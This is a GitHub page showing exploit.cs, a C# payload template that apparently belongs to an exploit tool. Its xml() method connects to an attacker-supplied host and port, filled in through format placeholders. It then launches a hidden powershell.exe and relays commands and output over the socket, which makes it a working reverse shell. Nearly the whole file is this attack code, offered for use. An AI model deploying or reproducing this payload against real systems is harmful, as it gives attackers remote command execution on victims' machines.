-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit.cs
49 lines (44 loc) · 1.81 KB
/
exploit.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
// using System;
// using System.Diagnostics;
// using System.IO;
// using System.Net;
// using System.Net.Sockets;
// using System.Text;
// Reference: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc
static System.IO.StreamWriter streamWriter;
public static void shellOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
System.Text.StringBuilder strOutput = new System.Text.StringBuilder();
if (!System.String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (System.Exception) {}
}
}
public string xml() {
System.Net.Sockets.TcpClient tcpClient = new System.Net.Sockets.TcpClient("%s", %d);
System.IO.Stream stream = tcpClient.GetStream();
System.IO.StreamReader streamReader = new System.IO.StreamReader(stream);
streamWriter = new System.IO.StreamWriter(stream);
System.Text.StringBuilder input = new System.Text.StringBuilder();
System.Diagnostics.Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName = "powershell.exe";
proc.StartInfo.CreateNoWindow = true;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.StartInfo.RedirectStandardInput = true;
proc.StartInfo.RedirectStandardError = true;
proc.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(shellOutputDataHandler);
proc.Start();
proc.BeginOutputReadLine();
while (true) {
input.Append(streamReader.ReadLine());
proc.StandardInput.WriteLine(input);
input.Remove(0, input.Length);
}
// Will we ever reach this line LOL
streamWriter.Close();
streamWriter.Close();
return "Success!";
}